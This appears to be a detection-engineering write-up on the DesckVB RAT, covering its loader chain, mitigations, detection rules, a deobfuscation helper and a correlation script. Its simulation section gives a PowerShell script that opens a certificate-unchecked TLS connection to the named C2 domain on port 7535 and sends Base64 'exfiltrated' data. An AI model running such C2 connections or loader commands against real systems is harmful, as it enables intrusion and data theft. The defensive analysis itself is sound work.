DesckVB RAT Analysis: From JavaScript Loader to Fileless .NET RAT
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
DesckVB RAT is a JavaScript-driven trojan that chains into a PowerShell loader to fetch and run a fileless .NET DLL directly in memory. To conceal execution, the loader relies on Base64 encoding and string-reversal obfuscation, abuses InstallUtil.exe as a LOLBin, and spawns a new process using CreateProcessA. Once active, the RAT establishes encrypted HTTPS C2 communications and supports modules for keylogging, webcam access, and anti-AV discovery.
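The summary notes that the loader hides its commands behind Base64 encoding and string reversal. The Python helper below is an added example, not code from the analysed sample or from the original page: it peels such layers off a constructed string so an analyst can recover the hidden command. The order in which the real loader applies the two transforms is an assumption here, so the function tries a plain Base64 decode first and a reverse-then-decode second, repeating until nothing decodes further. The sample command string is constructed and only reuses the script name given in the attack flow.

```python
import base64
import binascii

# Constructed sample (not taken from the sample): a command hidden the way the
# summary describes, i.e. Base64-encoded and then reversed.
PLAINTEXT = r"powershell -ExecutionPolicy Bypass -File C:\Users\Public\lkpzw_01.ps1"
OBFUSCATED = base64.b64encode(PLAINTEXT.encode()).decode()[::-1]
# Same string wrapped in one more plain Base64 layer, to show multi-layer peeling
DOUBLE_WRAPPED = base64.b64encode(OBFUSCATED.encode()).decode()


def _try_b64(s: str):
    """Return decoded text if s is valid Base64 yielding printable text, else None."""
    # Alphabet and length check first, so garbage never reaches b64decode
    if not s or len(s) % 4 or not all(c.isalnum() or c in "+/=" for c in s):
        return None
    try:
        text = base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    # Allow line breaks and tabs, which a recovered script may legitimately contain
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def deobfuscate(s: str, max_layers: int = 8):
    """Peel Base64 / reversed-Base64 layers until no further layer decodes.

    Returns (plaintext, layers), where layers records each transform applied in
    order. The transform order of the real loader is an assumption: a direct
    Base64 decode is attempted before reverse-then-decode at every layer.
    """
    layers = []
    current = s.strip()
    for _ in range(max_layers):
        decoded = _try_b64(current)
        if decoded is not None:
            layers.append("base64")
            current = decoded
            continue
        decoded = _try_b64(current[::-1])
        if decoded is not None:
            layers.append("reverse+base64")
            current = decoded
            continue
        break  # no recognised layer left
    return current, layers


if __name__ == "__main__":
    text, steps = deobfuscate(DOUBLE_WRAPPED)
    print("layers:", steps)
    print("recovered:", text)
```

Keeping the layer list alongside the recovered text is useful when writing the detection: it documents which obfuscation pattern the sample used, which in turn tells you which strings to look for in PowerShell script-block logging.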
Investigation
Analysis indicates the initial JavaScript stage writes a PowerShell script into C:\Users\Public, then reaches out to an obfuscated domain to download a .NET assembly (for example, ClassLibrary3.dll). The assembly loads supporting DLLs, creates a suspended process, and injects payload code while reporting configuration details such as a secondary malicious domain and port. Network telemetry confirms TLS-encrypted communications from the infected host to the attacker’s C2 infrastructure.
Mitigation
Block execution of untrusted or unsigned PowerShell scripts and restrict use of InstallUtil.exe for non-administrative or unexpected workflows. Apply strict outbound controls, including HTTPS inspection where feasible and domain reputation filtering for identified malicious infrastructure. On endpoints, detect CreateProcessA usage with suspended-process flags and alert on in-memory .NET assembly loading patterns consistent with fileless injection.
Response
If indicators are detected, isolate the endpoint, stop the malicious process chain, and capture memory dumps for analysis of in-memory assemblies and injected regions. Remove the dropped PowerShell artifacts from C:\Users\Public and eradicate any related DLLs or loader remnants. Reset impacted credentials, rotate exposed secrets, and review firewall/proxy logs for outbound connections to the listed domains and ports.
Attack Flow
graph TB
  %% Class definitions
  classDef action fill:#ffcc99
  classDef tool fill:#99ccff
  classDef malware fill:#ccffcc
  classDef file fill:#dddddd

  %% Nodes
  loader_js["<b>Tool</b> – <b>Name</b>: Obfuscated JavaScript Loader<br/><b>Technique</b>: T1027.006 HTML Smuggling<br/><b>Technique</b>: T1027.008 Stripped Payloads<br/><b>Description</b>: Uses Base64 and reversed strings to hide commands"]
  class loader_js tool
  powershell_script["<b>Tool</b> – <b>Name</b>: PowerShell Script lkpzw_01.ps1<br/><b>Technique</b>: T1059.001 PowerShell<br/><b>Description</b>: Executes with bypassed execution policy"]
  class powershell_script tool
  dotnet_assembly["<b>File</b>: Malicious .NET Assembly"]
  class dotnet_assembly file
  installutil_execution["<b>Tool</b> – <b>Name</b>: InstallUtil.exe<br/><b>Technique</b>: T1218.004 System Binary Proxy Execution<br/><b>Description</b>: Executes .NET DLL via trusted system binary"]
  class installutil_execution tool
  dotnet_reflection["<b>Malware</b> – <b>Name</b>: ClassLibrary3.dll<br/><b>Technique</b>: T1620 Reflective Code Loading<br/><b>Description</b>: Loads assembly directly into memory using reflection"]
  class dotnet_reflection malware
  process_hollow["<b>Action</b> – <b>Technique</b>: T1055.012 Process Hollowing<br/><b>Description</b>: Creates a suspended process and injects malicious code"]
  class process_hollow action
  thread_hijack["<b>Action</b> – <b>Technique</b>: T1055.003 Thread Execution Hijacking<br/><b>Description</b>: Hijacks thread execution within the target process"]
  class thread_hijack action
  dll_hijack["<b>Action</b> – <b>Technique</b>: T1574.001 DLL Hijack Execution Flow<br/><b>Description</b>: Loads additional DLLs in memory to extend functionality"]
  class dll_hijack action
  keylogger_module["<b>Malware</b> – <b>Name</b>: Microsoft.exe<br/><b>Technique</b>: T1056.001 Keylogging<br/><b>Description</b>: Drops keylogger and other modules"]
  class keylogger_module malware
  c2_https["<b>Action</b> – <b>Technique</b>: T1071.001 Web Protocols<br/><b>Description</b>: Communicates over HTTPS blending with legitimate traffic"]
  class c2_https action

  %% Connections
  loader_js -->|writes and executes| powershell_script
  powershell_script -->|downloads assembly| dotnet_assembly
  dotnet_assembly -->|executed via| installutil_execution
  installutil_execution -->|loads with reflection| dotnet_reflection
  dotnet_reflection -->|creates suspended process| process_hollow
  process_hollow -->|uses thread hijacking| thread_hijack
  thread_hijack -->|loads additional DLLs| dll_hijack
  dll_hijack -->|enables| keylogger_module
  keylogger_module -->|communicates with C2| c2_https
Detections
- Powershell Executing File In Suspicious Directory Using Bypass Execution Policy (via cmdline)
- LOLBAS WScript / CScript (via process_creation)
- Suspicious Powershell Strings (via powershell)
- Call Suspicious .NET Classes/Methods from Powershell CommandLine (via process_creation)
- Suspicious Files in Public User Profile (via file_event)
- Suspicious Execution from Public User Profile (via process_creation)
- IOCs (SourceIP) to detect: DesckVB RAT Analysis: From JavaScript Loader to Fileless .NET RAT
- IOCs (HashMd5) to detect: DesckVB RAT Analysis: From JavaScript Loader to Fileless .NET RAT
- IOCs (HashSha256) to detect: DesckVB RAT Analysis: From JavaScript Loader to Fileless .NET RAT
- IOCs (DestinationIP) to detect: DesckVB RAT Analysis: From JavaScript Loader to Fileless .NET RAT
- Detection of DesckVB RAT C2 Communication [Windows Network Connection]
- Detection of DesckVB RAT PowerShell and InstallUtil Execution [Windows Powershell]
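The rule titles above each key on a single event. The Python below is an added example, not one of the listed rules and not code from the original page: it shows how those per-event signals can be scored together per host over constructed Sysmon-style events, so that a script host starting, a .ps1 landing in C:\Users\Public, PowerShell running with a bypassed execution policy, InstallUtil.exe being handed a DLL, and powershell.exe connecting to the port used in the simulation section below raise one correlated alert while an isolated administrative PowerShell run does not. The event field names, hostnames, timestamps and the invoice.js path are constructed; the script name, DLL name, domain and port come from this page.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Sysmon-style events (not real telemetry). WS01 shows the loader
# chain from the attack flow; WS02 is benign admin activity used as a control.
EVENTS = [
    {"ts": "2024-01-01T10:00:00", "host": "WS01", "type": "process_creation",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\bob\Downloads\invoice.js"},
    {"ts": "2024-01-01T10:00:02", "host": "WS01", "type": "file_event",
     "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\Public\lkpzw_01.ps1"},
    {"ts": "2024-01-01T10:00:03", "host": "WS01", "type": "process_creation",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\lkpzw_01.ps1"},
    {"ts": "2024-01-01T10:00:09", "host": "WS01", "type": "process_creation",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "cmdline": r"InstallUtil.exe C:\Users\Public\ClassLibrary3.dll"},
    {"ts": "2024-01-01T10:00:15", "host": "WS01", "type": "network_connection",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dst_port": 7535, "dst_host": "manikandan83.mysynology.net"},
    {"ts": "2024-01-01T11:00:00", "host": "WS02", "type": "process_creation",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

PUBLIC_PROFILE = re.compile(r"c:\\users\\public\\", re.IGNORECASE)
# -ExecutionPolicy Bypass and its common abbreviations (-ep / -exec)
BYPASS_POLICY = re.compile(r"-(?:ep|exec(?:utionpolicy)?)\s+bypass", re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
C2_PORT = 7535  # port from this page's simulation; real campaigns vary


def image_name(event):
    """Lower-cased executable name from a full image path."""
    return event.get("image", "").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Map one event to the loader-chain stage it satisfies, or None."""
    kind, name = event["type"], image_name(event)
    cmd = event.get("cmdline", "")
    if kind == "process_creation":
        if name in SCRIPT_HOSTS:
            return "lolbas_script_host"
        if name == "powershell.exe" and BYPASS_POLICY.search(cmd) and PUBLIC_PROFILE.search(cmd):
            return "powershell_bypass_public_dir"
        if name == "installutil.exe" and re.search(r"\.dll\b", cmd, re.IGNORECASE):
            return "installutil_dll_proxy"
    elif kind == "file_event" and PUBLIC_PROFILE.search(event.get("target", "")):
        return "file_in_public_profile"
    elif kind == "network_connection" and name == "powershell.exe" and event.get("dst_port") == C2_PORT:
        return "powershell_c2_port"
    return None


def correlate(events, window=timedelta(minutes=5), min_stages=3):
    """Collect stage hits per host and alert when at least min_stages distinct
    stages fall inside one sliding window. Returns {host: sorted stage names}."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev)
        if stage:
            by_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), stage))
    alerts = {}
    for host, hits in by_host.items():
        for i, (t0, _) in enumerate(hits):
            stages = {s for t, s in hits[i:] if t - t0 <= window}
            if len(stages) >= min_stages:
                alerts[host] = sorted(stages)
                break
    return alerts


if __name__ == "__main__":
    for host, stages in correlate(EVENTS).items():
        print(f"{host}: {len(stages)} stages -> {', '.join(stages)}")
```

Requiring several distinct stages within a short window is what keeps the single benign PowerShell run on WS02 from alerting; tune `min_stages` and `window` against your own baseline rather than taking the values here as given.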
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
Attack Narrative & Commands:
The attacker, having obtained an initial foothold, launches a PowerShell-based “living-off-the-land” payload that opens a TLS-wrapped TCP connection to the hard-coded C2 domain manikandan83.mysynology.net on port 7535. The payload encodes a dummy data block with Base64 (illustrating T1132.002) and streams it over the TLS channel. Because PowerShell’s .NET classes are used, no external binaries are written to disk, mirroring the fileless nature of DesckVB RAT. The connection is established by a child process (powershell.exe), which Sysmon captures as a network connection event carrying the exact domain, port, and TLS handshake flag the rule monitors.
Regression Test Script:
# --------------------------------------------------------------
# DesckVB RAT C2 Communication Simulation (PowerShell)
# --------------------------------------------------------------

# Parameters
$c2Domain = "manikandan83.mysynology.net"
$c2Port   = 7535

# Dummy payload (Base64-encoded) - represents exfiltrated data
$payload = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("sensor_data=42"))

try {
    # Establish TCP connection
    $tcpClient = New-Object System.Net.Sockets.TcpClient($c2Domain, $c2Port)
    $netStream = $tcpClient.GetStream()

    # Wrap with TLS (SslStream); the validation callback returns $true so the
    # handshake completes regardless of the remote certificate chain
    $sslStream = New-Object System.Net.Security.SslStream($netStream, $false, ({ $true }))
    $sslStream.AuthenticateAsClient($c2Domain)
    # ${var}: braces keep PowerShell from parsing "$c2Domain:" as a scoped variable
    Write-Host "[+] TLS handshake completed with ${c2Domain}:${c2Port}"

    # Send payload length prefix (4-byte big-endian) then data
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($payload)
    $len   = [BitConverter]::GetBytes([System.Net.IPAddress]::HostToNetworkOrder($bytes.Length))
    $sslStream.Write($len, 0, $len.Length)
    $sslStream.Write($bytes, 0, $bytes.Length)
    $sslStream.Flush()
    Write-Host "[+] Payload sent (Base64 length $($bytes.Length))"
}
catch {
    Write-Error "[-] Connection failed: $_"
}
finally {
    # Clean shutdown; each variable is $null if the matching step never ran
    if ($sslStream) { $sslStream.Close() }
    if ($netStream) { $netStream.Close() }
    if ($tcpClient) { $tcpClient.Close() }
    Write-Host "[*] Connection terminated."
}
Cleanup Commands:
# Ensure any lingering PowerShell connections to the simulated C2 port are closed.
# Loaded-module names cannot identify a TcpClient (it lives in System.dll), so the
# owning process is looked up from the established TCP connection instead.
Get-NetTCPConnection -RemotePort 7535 -State Established -ErrorAction SilentlyContinue |
    ForEach-Object { Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue } |
    Where-Object { $_.ProcessName -eq 'powershell' -and $_.Id -ne $PID } |
    Stop-Process -Force

# Optional: Remove Sysmon (if this is a one-off test environment)
# & "$env:ProgramFiles\Sysmon\Sysmon.exe" -u